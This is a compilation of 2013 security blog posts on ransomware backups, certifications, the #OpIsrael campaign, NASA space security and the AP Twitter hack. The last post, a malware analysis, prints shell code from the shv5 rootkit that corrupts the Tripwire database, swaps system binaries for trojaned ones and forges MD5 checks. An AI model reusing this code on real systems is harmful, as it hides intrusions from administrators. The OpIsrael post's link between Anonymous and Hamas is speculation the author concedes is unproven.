The best defense against ransomware damage is to regularly back up data. While technicians can remove most infections, some systems will have partly or totally unrecoverable files. Further, current backups provide access while the infected computer is being worked on. Users should be wary of trying to remove ransomware on their own. Even if commercial software manages to unlock the screen, malware could still be running in the background and capturing sensitive data such as passwords and account numbers. Commercial anti-virus products can detect common ransomware, and users can foil many attacks by simply keeping anti-virus and anti-spyware software up to date. Additionally, users should follow computer housekeeping procedures such as these:

Back up data to an external source such as a cloud service or storage device that is usually disconnected from the computer. Consider automating backups to run every 24 hours at a convenient time.
Keep anti-virus and anti-spyware software current and configure automatic updates.
Make sure that security software automatically scans all downloads either as part of browser integration or in real time.
Install software updates. Many operating system, software and browser patches contain crucial security fixes.
Disable Bluetooth when not in use and do not automatically accept unknown connections.
Disable AutoPlay and disconnect removable drives when not in use.

Data kidnapping preys on users desperate to regain access to personal or professional files. Sophisticated techniques can intimidate even people savvy enough to sidestep most malware. To contain the threat, users must learn to lock down their systems before hackers do it for them.

About the Author

This is a guest post from [1]Megan Horner, Marketing Coordinator at TrainACE. TrainACE offers [2]advanced cyber security training such as Mobile Hacking and Wireless Security. Follow TrainACE on Twitter [3]@pentesttraining.
1. https://plus.google.com/u/0/108360956002935408468/about 2. http://www.trainace.com/security/ 3. http://twitter.com/pentesttraining

3.3.3 FREE Game Download: PC Defender (2013-03-16 00:51)

To help promote my blog a little I've decided to start making a few security-themed games. The first game I'm releasing is PC Defender.

[1] (image: PC Defender screenshot)

The game is very simple - but provides increasing levels of difficulty as you continue to play. Your ship is your anti-virus software. Your mission is to eradicate as much malware as possible. It's a silly yet addictive game. I hope you enjoy it! You can download the game [2]here. The game was created using Game Maker. As always...be sure to scan with anti-virus any file you download from the Internet.
1. http://2.bp.blogspot.com/-D82Kt9sFaBY/UUP5dvo-tXI/AAAAAAAAAWc/H5kPafXi2mo/s1600/screenshot.jpg 2. https://docs.google.com/file/d/0B1ZA4ubLZ4YKa0Nhcjh5WE5xQm8/edit?usp=sharing

3.3.4 CASP now DoD 8570 Approved - Free Practice Exams to Help Study! (2013-03-16 15:34)

According to DISA the CompTIA Advanced Security Practitioner (CASP) is now 8570 approved. [1]http://iase.disa.mil/eta/iawip/content_pages/iabaseline.html This is great news for those looking for a more affordable alternative to CISSP for IAT level III and IAM level II compliance. As one of the first recipients of the CASP I am absolutely thrilled by this and feel DISA has chosen the correct categorization for this certification. It's a very tough certification - and requires the person taking the certification to have hands-on experience with multiple security and networking technologies. If you're looking to take the CASP I would recommend taking practice exams for the CompTIA Security+, CISSP, and Cisco CCNP. You can access all of these practice exams for free at my [2]Career Tools blog.

1. http://iase.disa.mil/eta/iawip/content_pages/iabaseline.html 2. http://caffeinejobs.blogspot.com/p/certification.html

3.3.5 Anonymous OpIsrael - Prelude to a Hamas Attack? (2013-03-16 16:43)

On April 7th Anonymous plans to disable the Israel government's Internet capabilities [1]through a massive hacking/denial of service attack. It has long been suspected that Hamas has a great influence inside Anonymous. Th3j35t3r and others, including myself, have repeatedly warned that Anonymous has been infiltrated by terror organizations - and #OpIsrael may be Hamas' way of disabling Internet communications of the Israel government prior to an attack. Today I performed some analysis using Recorded Future with some interesting results. In November 2012 there was significant activity by Anonymous and Hamas against Israel. However, even more interesting is that Hamas activity decreased during several days on which Anonymous began to carry out cyber attacks. According to Recorded Future, Anonymous attacks on April 7 are only a few days before planned Hamas activity in Israel. At the very least, these two events are extremely interesting coincidences. You can view my analysis at [2]Recorded Future. However, the rabbit hole goes a little deeper. I've recently uncovered an #OpIsrael related image which has suspected embedded steganography.

[3] (image: the suspected #OpIsrael steganography image)

The original image is available on [4]Twitter. The image provided a 1 star hit for containing hidden data using jphide. I will be attempting to crack it - but if anyone else would like to give it a try that would be great. If you look closely at the image you will find that there is a thin white strip on the side of the photo - making the photo 599 pixels wide and 597 pixels tall. Kind of an odd size for an image. Looking back at my [5]original steganography post you will see that the suspected steganography image was an unusual size as well...with one extra row of pixels added. Is any of this condemning proof that Anonymous is being controlled by Hamas? No - but it's all very interesting when you take a step back and look at the big picture.
1. http://www.thehackerspost.com/2013/03/opisrael-hacktivists-starting-cyber.html
2. https://recordedfuture.com/live/sc/4SubR5Gj9HXm
3. http://1.bp.blogspot.com/-P703Bsb3s1A/UUTW1ym7WyI/AAAAAAAAAWs/eBWcQBuC93U/s1600/BFPLxuCCAAIMbEs.jpg
4. https://twitter.com/pinupgirllover/status/311816854240886784
5. http://caffeinesecurity.blogspot.com/2013/01/anonymous-and-steganography-blindly.html

3.3.6

Threat Watch Updated with Cyber Threat Forecasting (2013-03-25 09:01)

Thanks to the folks at [1]RecordedFuture, I have updated the [2]Threat Watch page with a 90-day cyber threat forecast monitor. The monitor is also reproduced in this post below: [3]Cyber Threat Forecast - Next 90 Days via Recorded Future (embedded Recorded Future monitors: [4], [5]).
1. http://www.recordedfuture.com/
2. http://caffeinesecurity.blogspot.com/p/threat-watch.html
3. https://recordedfuture.com/live/sc/4DBhXH1ctlHt
4. https://recordedfuture.com/live/sc/7eW08kJt7MzF?embed=true&rs=true&vs=false&embedpopovers=true
5. https://recordedfuture.com/live/sc/4YDn6odE0TpQ?embed=true&rs=true&vs=false&embedpopovers=true


3.3.7

Free Windows 8 Security eBook! Expires 4/4 (2013-03-29 21:29)

[1] [2]Receive Your Complimentary eBook NOW! Windows 8 Security (Free eBook offer expires on 4/4). As an IT professional, you are quite possibly being asked to review Windows 8 and determine if it is a good fit for your organization. Or you are being asked to implement Windows 8, or to develop a transition plan that moves your organization's systems from their current operating system to Windows 8 over time. Other than the interface, which is of course the focus of the user experience, Windows 8 comes with increased security features designed to make your life as an IT professional easier. These features are supposed to enhance security and give you enhanced tools for support and protection. Some of the topics covered in this eBook: UEFI, Dynamic Access Control, BranchCache, DirectAccess, BitLocker, Virtualization, Social Media, SmartScreen and Windows To Go. Does Windows 8 deliver on this promise? Find out in this eBook. [3]Get your copy today!
1. http://2.bp.blogspot.com/-Hf_Fm4OCot4/UVY_iIgpSkI/AAAAAAAAAW8/8uUhm6BlNFc/s1600/w_wing03c.gif
2. http://caffinesecurity-blogspot.tradepub.com/free/w_wing03/prgm.cgi
3. http://caffinesecurity-blogspot.tradepub.com/free/w_wing03/prgm.cgi

3.4

April

3.4.1

The Cyber Security Silver Bullet is Finally Here! (2013-04-01 14:08)

Due to the overwhelming demand for an all-in-one security solution, Caffeine Security is happy to announce our solution, which we are releasing as the Caffeine Security Silver Bullet. This net appliance will be the ultimate solution to all of your security needs. Here is an infogram of everything contained within the Silver Bullet. Click to enlarge.

[1]

Here's a breakdown of what you get in the Silver Bullet:

Virus Sterilizer - Scans all incoming packets and automatically identifies viral packets. These packets are replaced with null terminators, which have been specifically designed not to become self-aware.

Intrusion Zapper - Provides intrusion prevention for network and physical access. When a physical intrusion is detected, a small electrical charge is sent to the offender. If the offender does not leave, increased voltage is applied until the offender leaves or is incapacitated.

Phish Fryer - Detects any employee responses to phishing emails, and automatically cooks the email, replacing the credentials with false ones and wasting the phisher's time. An alert is also sent to management, so that the employee can be disciplined appropriately.

Social Engineer Deterrence Headslapper - Monitors employee communications for responses to social engineering. Should an employee begin to respond to social engineering, a robotic arm locates the employee's position and provides a gentle head slap as a reminder not to respond.

RFC1149 Transmission Redundancy Module - Monitors for lost network packets. If network packet loss exceeds the predefined threshold, the RFC1149 module will kick in and begin releasing network transmissions through the redundant carrier system.

BONUS Green Backup Generator - The backup generator can provide enough power to keep your network room running in the case of a power failure. Through the marvels of science, this generator requires only small amounts of food and water to keep running indefinitely.

[2] Above is the power source used by the prototype backup unit. The actual backup unit uses two of the above power sources, which will alternate spinning the generator flywheel. Optionally, a third power source can be added for redundancy. These power sources are self-replicating, and the housing unit should be cleaned periodically during routine maintenance windows. Final production release of the Silver Bullet is still TBD, but we're currently aiming for December 1, 2013. Stay tuned to Caffeine Security, and you'll receive further updates on this latest innovation!
1. http://3.bp.blogspot.com/-kUr2yHS6A-4/T3hrlvbMJ7I/AAAAAAAAAJQ/zma75I6YKRY/s1600/CaffSecSilverBullet.png
2. http://4.bp.blogspot.com/-JvGCkEWud1g/T3hxuUwTdmI/AAAAAAAAAJY/HGBN5glU7T0/s1600/giant-hamster.jpg

3.4.2

If you could ask a question about Space Security, what would it be? (2013-04-02 19:51)

[1] I've been given an excellent opportunity to attend the NASA/Orbital [2]Antares rocket test launch at Wallops Flight Facility in Wallops Island, Virginia under NASA's [3]social media credentials program. I hope to learn and share fascinating information such as how remote flight telemetry and control of spacecraft is secured from tampering and interception. However - since my blog wouldn't be the same without reader interaction - I'd like to take the time to find out what information security related questions my readers would like to have answered. Please go to Facebook and [4]answer the poll! Feel free to add your own question if you don't see one listed you're interested in. Please try to keep questions information security/computer security related. I will gather questions until a few days before launch - then select the best ones from the poll.
1. http://4.bp.blogspot.com/-w_cO1L_Ku7c/UVtumRB1C_I/AAAAAAAAAXM/yojNueGG4D0/s1600/NASA_logo.png
2. http://www.orbital.com/SpaceLaunch/Antares/
3. http://www.nasa.gov/connect/social/credential_antares_apr2013.html
4. https://www.facebook.com/questions/455078737899513/

3.4.3

Hackers Breakfast - Absolutely Great Learning Experience (2013-04-03 20:00)

[1] Today I had the privilege of attending a free training seminar put on by [2]TrainACE called [3]The Hackers Breakfast. The topics of the day were advanced persistent threats and one of my favorite topics, honeypots. Not only did I get a free breakfast, but I learned a lot from Alex Lanstein of FireEye and Timber Wolfe of Neustar, Inc. If you haven't attended one of these yet, I would strongly encourage you to do so. TrainACE provides the training completely free of charge - and you'll get to learn about some of the other training opportunities which are coming up. This wasn't your typical free advertisement disguised as a seminar. In fact, the training provided was extremely informative and useful - and there wasn't any pressure to buy anything or sign up for any future training classes. I'd like to give a big shout out to Megan Horner for inviting me to the event. Megan recently submitted a guest blog post which you can view [4]here.
1. http://4.bp.blogspot.com/-3XYZw2T3bZM/UVy_tf4PhpI/AAAAAAAAAXc/_SsSi2u4Xus/s1600/hackersbreakfast.jpg
2. http://www.trainace.com/
3. http://www.hackersbreakfast.com/
4. http://caffeinesecurity.blogspot.com/2013/03/guest-post-ransomware-threat-escalates.html

3.4.4

Voices in the Static: Proactive Cyber Threat Monitoring (2013-04-05 17:26)

Your network is under attack. Right now. This very moment, your public-facing IP address space is being scanned and probed by someone. In fact, the entire Internet is being scanned by so many malicious attackers on a 24/7 basis that, according to SANS, the longest an unprotected computer can hope to last on the Internet without being compromised is seven minutes. So what can you do to help determine which threats to monitor for and which ones to ignore? Read my [1]Guest Blog Post at Recorded Future to find out more!
1. https://www.recordedfuture.com/2013/guest-post-voices-in-the-static-proactive-cyber-threat-monitoring/

3.4.5

New Research Project: Project Ackbar (It's A Trap!) (2013-04-08 19:36)

[EMBED]

Today I'm embarking on a new long-term project. I am seeding social media sites with unique email addresses in the hope of catching when a database has been compromised. Each email address is being set up through [1]Mailinator, and the inboxes are being monitored through RSS feeds using [2]IFTTT. When one of the email addresses receives an email, or a Google alert discovers the email address published on the web, I will receive an alert so that I can review it and see if the email address has been compromised. I'll update any hits as they come in. So far I've registered special email addresses on the following websites. This list will be updated as more are added.

Twitter.com
Facebook.com
MySpace.com

Big shout out to Timber Wolfe from NeuStar, Inc. for inspiring me to start this project. Timber was one of the presenters at TrainACE's [3]Hackers Breakfast event on 4/3/2013 and presented an excellent piece on Honey Pots, Honey Nets, and Honey Farms.
1. http://mailinator.com/
2. http://iftt.com/
3. http://www.hackersbreakfast.com/

3.4.6

How Rockets and Spacecraft Are Controlled Remotely (2013-04-12 10:42)

One of the topics I'm hoping to discuss with NASA and Orbital on my upcoming visit to the Antares rocket launch is how rockets and spacecraft are controlled remotely - and how this communication is secured from tampering by outside parties. I'm not a rocket scientist - and since this really is rocket science - I figured I should start reading up on the topic. I found on Archive.org a book from 1964 titled Radio Control of Rockets. The book was written by two Russian scientists and contributed to by NASA. It discusses the theory behind remote control of a rocket. If you're interested in learning more, visit the [1]Archive.org page and start reading the book!
1. http://archive.org/details/nasa_techdoc_19660013085

3.4.7

Could you Hack the Mars Rover? (2013-04-12 10:58)

More related reading for my upcoming trip to the Antares rocket launch - this article outlines the difficulties of remotely gaining control of a NASA spacecraft such as the Mars Rover. [1]http://www.extremetech.com/extreme/134334-could-you-hack-into-mars-rover-curiosity
1. http://www.extremetech.com/extreme/134334-could-you-hack-into-mars-rover-curiosity

3.4.8

A Potential Look at the Security Technology Behind #Antares and #Cygnus Remote Control (2013-04-12 12:14)

[1] The main purpose of the Antares rocket is to launch the [2]Cygnus spacecraft - a remotely controlled cargo craft designed to deliver cargo to/from the International Space Station. Some searching of patents by Orbital Sciences Corporation will reveal [3]a patent from 2009 describing "A secondary payload interface for payload communications using a primary payload communications channel is provided." This is essentially a space version of a radio repeater or WiFi range extender - and it also provides for a redundant communications network to ensure that remotely controlled spacecraft and satellites can remain in constant contact with ground control. The patent discusses the potential for using communications satellites to relay commands remotely:

Although typically built with that single purpose in mind, these satellites may provide platforms for secondary payloads. For example, communications satellites can provide power, thermal control, and attitude control system (ACS) functions, as well as other services, to secondary payloads, such as, for example, earth-observing or weather-monitoring payloads. An auxiliary high rate communications system can be provided on the communications satellite to accommodate the secondary payload. And good news! The patent is designed with security (encryption) in mind!

In some embodiments, the secondary payload interface may be designed such that control and telemetry interactions with the operators of the primary payload and/or the host satellite (which may be the same or different) are limited. For example, control interactions may be limited to power connections. As another example, telemetry interactions may be limited to discrete telemetry points that provide insight into the basic health of the secondary payload interface. As a result, the secondary payload may still be securely controlled by its operator without involvement by the operations center of the primary payload and/or the host satellite. This approach provides segregation of signals between an encrypted state and a non-encrypted state (e.g., a red/black interface) as required by some encryption systems.

A second possibly related patent by Orbital describes Emergency Communications Channel Systems and Methods for Satellite Command. This patent can be accessed [4]here. This patent creates a backup system for satellite communications - ensuring availability of control if something goes wrong with traditional satellite communications.

[5] To address [...] shortcomings within [remote satellite control], an Emergency Communications Channels (ECC) satellite command system according to one aspect of invention enables commanding of a satellite by remotely modulating telemetry data parameters indicative of the operation of one or more of the satellite's payloads by modulating signals sent directly to the payload from a ground station.

The two above patents definitely show that Orbital understands the importance of implementing security and redundancy in space systems - and is actively implementing important security concepts in their spacecraft and launch systems. I look forward to discussing this topic further with them when I visit NASA's Wallops Flight Facility in a few days.
1. http://3.bp.blogspot.com/-Hw0DMzeFmsg/UWgrhEIy1kI/AAAAAAAAAXs/SIEcEy9uUMk/s1600/orbital-patent.jpg
2. http://www.orbital.com/NewsInfo/Publications/Cygnus_fact.pdf
3. http://www.faqs.org/patents/app/20090052369
4. http://www.faqs.org/patents/app/20120259485
5. http://2.bp.blogspot.com/-sYcMoi0bM3A/UWgvc12mUwI/AAAAAAAAAX0/4sJ9WwkOpwQ/s1600/orbital-patent-2.png

3.4.9

Want to Give Me Feedback During the Antares Launch Event? Call Me! (2013-04-12 19:46)

Because I'm going to be almost completely disconnected for about a week, I've added to my blog the ability for you to leave a voicemail to give me feedback during the Antares launch event. I will check voicemail nightly and, if possible, include any feedback in the next day's events. Thanks!

3.4.10

Space Security Article Series - Stay Tuned! (2013-04-18 23:22)

I am back from my trip to Wallops Flight Facility and feverishly working on organizing all my notes and recordings to begin my series of Space Security articles. In the meantime, I'd like to encourage you to check out the pictures and videos I've uploaded from this AMAZING event!

Facebook: [1]https://www.facebook.com/CaffSec
YouTube: [2]http://www.youtube.com/user/CaffeineSecurity

I will be writing a thank you letter to all of the organizations and people who took the time to meet with me, but in the meantime I'd like to give a big shout out to the following organizations:

NASA Wallops
NASA Social
Orbital Sciences Corporation
ATK

Thank you all for helping make the Antares NASA Social event fantastic!
1. https://www.facebook.com/CaffSec
2. http://www.youtube.com/user/CaffeineSecurity

3.4.11

Police Scanners and COMSEC (or lack thereof) (2013-04-19 11:16)

I couldn't help but shake my head when Boston police recently shut down online streams of their police scanners during their hunt for terror suspects related to the Boston marathon bombings. Police even went so far as to [1]request that people not tweet information they hear on police scanners. And while most Twitter users complied, some began to attack other Twitter users merely for providing links to working scanner streams, because they were "endangering the lives of officers". There's a logical fallacy in this thinking. The problem with shutting down online streams of police scanners is that it does nothing to prevent suspects from listening on local radio scanners. Police radio frequencies are well known, and anyone with a cheap handheld scanner can monitor them locally. Perhaps it's time for police departments to begin using encrypted TAC channels during manhunts, [2]much like the military does when in a combat zone? To provide an analogy for those less tech savvy, Boston PD's request is equivalent to shouting a secret across a crowded public auditorium, asking everyone in the auditorium not to share said secret, then continuing to speak slightly more softly while distributing additional secrets. The strangers sitting nearby have no legal obligation not to pass the information they overheard to the rest of the room. The only answer to the auditorium problem, much like the radio problem, is to encrypt your messages, so that even if everyone overhears, they can't understand the secret. [3]COMSEC isn't something new, and has been around for a very long time. Maybe it's time for civilian police departments to catch up.
1. http://www.dailydot.com/news/bostom-police-stop-tweeting-locations/
2. http://www.armedforces-int.com/article/military-encryption-in-the-armed-forces-today.html
3. http://en.wikipedia.org/wiki/Communications_security

3.4.12

Space Security Starts on the Ground (2013-04-19 20:03)

This is the first of a series of articles on Space Security. In the article series, we will look at the current strengths and weaknesses of NASA's cyber security efforts. [EMBED]

The above video was taken on April 17, 2013 at Wallops Flight Facility during the Antares NASA Social launch event. In it, Deputy Administrator Lori Garver discusses the importance of Cyber Security and NASA. NASA was criticized in 2009 by the Government Accountability Office (GAO) for having security vulnerabilities in key networks, despite important progress in securing their computer systems. According to the report:

Although NASA has made important progress in implementing security controls and aspects of its information security program, it has not always implemented appropriate controls to sufficiently protect the confidentiality, integrity, and availability of the information and systems supporting its mission directorates. Specifically, NASA did not consistently implement effective controls to prevent, limit, and detect unauthorized access to its networks and systems. For example, it did not always sufficiently (1) identify and authenticate users, (2) restrict user access to systems, (3) encrypt network services and data, (4) protect network boundaries, (5) audit and monitor computer-related events, and (6) physically protect its information technology resources.

After reviewing the report, the Deputy Administrator concurred with its findings and set forth a plan to improve:

In providing written comments on a draft of this report (reprinted in app. IV), the NASA Deputy Administrator concurred with our recommendations and noted that many of the recommendations are currently being implemented as part of an ongoing strategic effort to improve information technology management and IT security program deficiencies. In addition, she stated that NASA will continue to mitigate the information security weaknesses identified in our report. The actions identified in the Deputy Administrator's response will, if effectively implemented, improve the agency's information security program.

The full report can be read on the GAO website, [1]report GAO-10-4. But has NASA improved their security on the ground? While NASA employees were unable to provide me any specific details of their cyber security program, some information about the program is available online. The first stop is NASA's Office of the Chief Information Officer (CIO). On the CIO's webpage, a [2]list of all relevant NASA security documentation can be found. These documents are all dated and given report numbers. While the actual documents are not available online, the titles are provided. A total of thirty-three IT Security Handbooks are listed on the site, all with an effective date of 2010 or later, most of them dated 2011 or 2012. Several of the handbooks are based upon [3]FIPS 199, which helps agencies meet [4]FISMA requirements. So from a policy standpoint, NASA is showing definite signs of improvement.

But what about raw numbers? What about the actual number of security incidents at NASA? According to the GAO report, NASA reported 1,120 security incidents that resulted in the installation of malicious software on their systems or unauthorized access to sensitive data in FY 2007 and FY 2008. Flash forward to a Threat Post [5]article from March 2012: in FY 2010 and FY 2011, NASA reported 5,408 similar security incidents.
At first glance, this sharp increase appears to reflect poorly on NASA. However, it is important to take into account that these are reported incidents, not actual incidents. It is quite likely that prior to improving their security posture, NASA was experiencing just as many, if not more, security incidents, and they just didn't know it due to inadequate monitoring. The fact of the matter is, NASA is still playing catch up with their cyber security program. Based upon the documents listed on their website, NASA has the framework in place for a robust cyber security program; it just needs to take the time to make sure all of its employees and contractors have complied with their personal responsibility to enforce the program. Stay tuned for the next article on Space Security, coming soon!
1. http://www.gao.gov/assets/300/296854.pdf
2. http://www.nasa.gov/offices/ocio/itsecurity/
3. http://www.itl.nist.gov/lab/bulletns/bltnmar04.htm
4. http://csrc.nist.gov/groups/SMA/fisma/index.html
5. http://threatpost.com/nasa-computers-hacked-repeatedly-last-two-years-030312/


3.4.13

When it Comes to Space Security, Safety is Key (2013-04-21 16:21)

[1] This is the second article in my series on [2]Space Security. The Orbital [3]Antares rocket, scheduled to launch later today, is an excellent example of how important safety and security are for a space flight. During my recent trip to the Antares launch pad at NASA's [4]Wallops Flight Facility, I had the chance to discuss with former astronaut Carl Walz, currently Orbital's [5]Vice President of Human Space Flight Operations, the safety and security features incorporated into Antares as well as Cygnus, the cargo craft which will be launched by Antares later this year. Safety is critical for any rocket launch, especially when it comes to protecting human life. Much like most computer data centers, the Antares launch pad has redundant power systems: a commercial power feed, as well as generators the size of tractor trailers. These systems are set up to switch over automatically in the case of a failure. After all, you don't want to suddenly lose power while you're in the middle of a final countdown. Further similar to a data center, a rocket launch requires continuous monitoring. Any failure in monitoring could be disastrous, as a critical problem could be overlooked. Monitoring occurs during all phases of the mission - from launch pad, to liftoff, to flight, until the mission is completed. In fact, the first attempt to launch Antares had to be aborted due to [6]early detachment of a data cable.

There are multiple, redundant systems in place not only to verify the Antares rocket isn't headed towards a populated area, but also to destroy all sections of the rocket if there's a chance the rocket could even come close to impacting a populated area. Multiple systems are used to track the position and trajectory of Antares. NASA tracks the rocket primarily through RADAR, but the rocket also transmits GPS and accelerometer information. A computer uses the tracking information to verify the course is not outside the safety zone, as well as to constantly generate an instantaneous impact point, which uses physics to model where the impact would be if the rocket needed to be remotely destroyed. Antares contains an automatic destruct system as well as a manual destruct system. If the Orbital-built first stage, or the [7]ATK-built second stage, separates prematurely, the automatic destruct system will activate, destroying the entire launch vehicle. The manual destruct system can be triggered by NASA at any time during the launch if something is going wrong, and relies upon multiple redundant UHF receivers. Note that the Antares rocket does not yet include the Autonomous Flight Safety System, which has been [8]under development by NASA and [9]in test at Wallops Flight Facility. I feel very reassured after my discussions with Carl Walz, as well as several personnel from ATK and NASA, that state-of-the-art security and safety measures are in place to ensure that minimal risk to human life is present during all stages of the Antares mission. Antares is scheduled to lift off at 5 PM eastern on April 21, 2013. You can watch the launch live on [10]NASA TV. Stay updated on the launch status by following [11]@NASA Wallops, [12]@ATK, and [13]@OrbitalSciences on Twitter.

1. http://1.bp.blogspot.com/-MbjxwOdJUXE/UXQ_SfEF-nI/AAAAAAAAAYM/ACa0hwuJ5Bs/s1600/antares.jpg
2. http://caffeinesecurity.blogspot.com/search/label/Space%20Security
3. http://www.orbital.com/SpaceLaunch/Antares/
4. http://www.nasa.gov/centers/wallops/home/index.html
5. http://www.orbital.com/NewsInfo/release.asp?prid=692
6. http://www.space.com/20714-private-antares-rocket-launch-abort.html
7. http://www.slashgear.com/atk-successfully-tests-castor-30xl-upper-stage-solid-rocket-motor-29275723/
8. http://www.spacewar.com/reports/NASA_Developing_Autonomous_Flight_Safety_System_.html
9. http://www.nasa.gov/centers/wallops/news/subtecIII_prt.htm
10. http://www.ustream.tv/nasahdtv
11. https://twitter.com/NASA_Wallops
12. https://twitter.com/ATK
13. https://twitter.com/OrbitalSciences

3.4.14

Hacking the News for Profit - Stock Short Selling (2013-04-23 20:15)

Today the Associated Press Twitter account was hacked (quite possibly as the result of a sophisticated spear phishing campaign), and started posting fake news headlines. Specifically, a news headline was posted that there were multiple explosions in the White House, and that the president had been injured.

[1] And while the fact that [2]@AP was compromised was fascinating, what happened next is what should really get your attention. Shortly after the fake headline was posted, the Dow Jones plummeted 150 points.

[3] While the stock market recovered quickly after the news turned out to be fake, someone could potentially have made millions. If someone knew when and which stocks were going to drop due to the hacked Twitter account's announcement, they could have performed a [4]short sale on the affected stock(s). Even if the affected stocks only provided a 1% return, a short on $100,000,000 worth of stock would result in a $1,000,000 profit. Something tells me this won't be the last time we see stocks affected by a hacked social media account announcing fake news. There's a potential for great profit in it.
1. http://1.bp.blogspot.com/-20pd7CvcLNk/UXcWOcpIJ-I/AAAAAAAAAYc/HiCresM_KpM/s1600/aphacked.png
2. https://twitter.com/AP
3. http://2.bp.blogspot.com/-9rIwcvDTjEY/UXcX9YNNsMI/AAAAAAAAAYw/Tls1jIiEE40/s1600/djia.png
4. http://www.investopedia.com/university/shortselling/shortselling1.asp

3.4.15

Guest Post: I Can Have Most of My Threat Research Tools in a Single Interface? (2013-04-26 14:06)

The following is a guest post submitted to Caffeine Security. The owner of Caffeine Security is not responsible for its content. This post is being shared because I feel this has the potential to be a very informative webinar. I previously attended a TrainACE Hackers Breakfast which you can read about in a [1]previous post.

The answer is Yes! Join Advanced Security by TrainACE in this FREE, hour-long webinar covering a few aspects of Advanced Threat Intelligence. During this webinar, you'll be part of a live demo analysis of a suspected malicious URL. Each malicious URL has the potential to completely cripple a company's network infrastructure, and it's important that any string which looks suspicious be fully analyzed before it falls into the hands of an unsuspecting victim. Attendees will also be shown how to effectively complete the majority of threat research from a single interface. Compiling all data into one spot will make it more manageable and make analysis much more effective. [2]REGISTER HERE NOW; space is limited! TrainACE is an IT Certification and cyber security training company. This is only one of many [3]free hacking tutorials they provide to the public. They also host regular meet-ups and events to discuss the latest and greatest topics in cyber security.

About the Author
This is a guest post from [4]Megan Horner, Marketing Coordinator at TrainACE. TrainACE offers [5]advanced cyber security training such as Mobile Hacking and Wireless Security. Follow TrainACE on Twitter [6]@pentesttraining.
1. http://caffeinesecurity.blogspot.com/2013/04/hackers-breakfast-absolutely-great.html
2. http://www.trainace.com/security/advanced-threat-intel-webinar/
3. http://www.trainace.com/security/security-events-webinars/
4. https://plus.google.com/u/0/108360956002935408468/about
5. http://www.trainace.com/security/
6. http://twitter.com/pentesttraining

3.5

May

3.5.1

April 2013 Set a New Record for My Blog - Over 14,000 page views! (2013-05-01 11:39)

I'm happy to say that April 2013 set a new record for my blog, with 14,573 unique page views. I'd just like to say thank you to everyone who takes the time to read my blog! With this large influx of visitors, I need to start working on more research projects and more content. Some of the research projects I want to get started on require funding. So if you would be so kind as to take a look at my [1]Complimentary Industry Resources site, find something you like, and sign up for it, I would greatly appreciate it. It won't cost you anything, and I get paid for every download or magazine subscription! Thanks!!!!
1. http://caffinesecurity-blogspot.tradepub.com/?pt=cat&page=Infosec&flt=all

3.5.2

Bypassing Tripwire and MD5 Hash Checking for Advanced Persistent Threats (2013-05-01 12:29)

Reviewing some of the malware setup scripts I've collected through my honeypot, the following code really caught my attention. This code is from the shv5 rootkit, which was released in 2010, and is detected by [1]most antivirus scanners.

echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire... ${RES}"
uname=`uname -n`
twd=/var/lib/tripwire/$uname.twd
if [ -d /etc/tripwire ]; then
    echo "${WHI} ALERT: TRIPWIRE FOUND! ${RES}"
    if [ -f /var/lib/tripwire/$uname.twd ]; then
        chattr -isa $twd
        echo -n "${DCYN}[${WHI}sh${DCYN}]# checking for tripwire-database... ${RES}"
        echo "${RED} ALERT! tripwire database found ${RES}"
        echo "${DCYN}[${WHI}sh${DCYN}]# ${WHI} dun worry we got handy-tricks for this :) ${RES}"
        echo > $twd
        echo "Tripwire segment-faulted !" >> $twd
        echo >> $twd
        echo >> $twd
        echo "The reasons for this may be:" >> $twd
        echo >> $twd
        echo "corrupted disc-geometry, possible bad disc-sectors" >> $twd
        echo "corrupted files while checking for possible change etc." >> $twd
        echo >> $twd
        echo "pls. rerun tripwire to build the database again!" >> $twd
        echo >> $twd
    else
        echo "${WHI} lucky you: Tripwire database not found. ${RES}"
    fi
else
    echo "${WHI} guess not. ${RES}"
fi

For those not familiar with it, [2]Tripwire is designed to monitor system files for unauthorized tampering. The above code, in all its simplistic glory, effectively negates any protection offered by Tripwire. It does so by simply corrupting the Tripwire database and making the administrator think it was due to a disk error. The same malware setup later on records the MD5 hash of certain key system files prior to installing the malware.

    # Say hello to md5sum fixer boys n gurls !
    if [ -f /sbin/ifconfig ]; then
        /usr/bin/md5sum /sbin/ifconfig >> .shmd5
    fi
    if [ -f /bin/ps ]; then
        /usr/bin/md5sum /bin/ps >> .shmd5
    fi
    if [ -f /bin/ls ]; then
        /usr/bin/md5sum /bin/ls >> .shmd5
    fi
    if [ -f /bin/netstat ]; then
        /usr/bin/md5sum /bin/netstat >> .shmd5
    fi
    if [ -f /usr/bin/find ]; then
        /usr/bin/md5sum /usr/bin/find >> .shmd5
    fi
    if [ -f /usr/bin/top ]; then
        /usr/bin/md5sum /usr/bin/top >> .shmd5
    fi
    if [ -f /usr/sbin/lsof ]; then
        /usr/bin/md5sum /usr/sbin/lsof >> .shmd5
    fi
    if [ -f /usr/bin/slocate ]; then
        /usr/bin/md5sum /usr/bin/slocate >> .shmd5
    fi
    if [ -f /usr/bin/dir ]; then
        /usr/bin/md5sum /usr/bin/dir >> .shmd5
    fi
    if [ -f /usr/bin/md5sum ]; then
        /usr/bin/md5sum /usr/bin/md5sum >> .shmd5
    fi

The setup then continues to back up the current system files and replace them with malware-infected copies:

    # Backdoor ps/top/du/ls/netstat/etc..
    cd $BASEDIR/bin
    BACKUP=/usr/lib/libsh/.backup
    mkdir $BACKUP
    # ps ...
    if [ -f /usr/bin/ps ]; then
        chattr -isa /usr/bin/ps
        cp /usr/bin/ps $BACKUP
        mv -f ps /usr/bin/ps
        chattr +isa /usr/bin/ps
    fi
    if [ -f /bin/ps ]; then
        chattr -isa /bin/ps
        cp /bin/ps $BACKUP
        mv -f ps /bin/ps
        chattr +isa /bin/ps
    fi
    # ifconfig ...
    chattr -isa /sbin/ifconfig
    cp /sbin/ifconfig $BACKUP
    mv -f ifconfig /sbin/ifconfig
    chattr +isa /sbin/ifconfig
    # netstat ...
    if [ -f /usr/sbin/netstat ]; then
        chattr -isa /usr/sbin/netstat
        mv -f netstat /usr/sbin/netstat
        chattr +isa /usr/sbin/netstat
    fi

The md5sum tool is even replaced with a custom copy, designed to return the original hash values recorded earlier:

    # md5sum ...
    chattr -isa /usr/bin/md5sum
    cp /usr/bin/md5sum $BACKUP
    mv -f md5sum /usr/bin/md5sum
    chattr +isa /usr/bin/md5sum

Now that the attacker has a silent foothold on the system, the setup script proceeds to check for potentially vulnerable services, and even checks for other rootkits:

    # CHECKING FOR HOSTILE ROOTKITS/BACKDORS
    mkdir $HOMEDIR/.owned
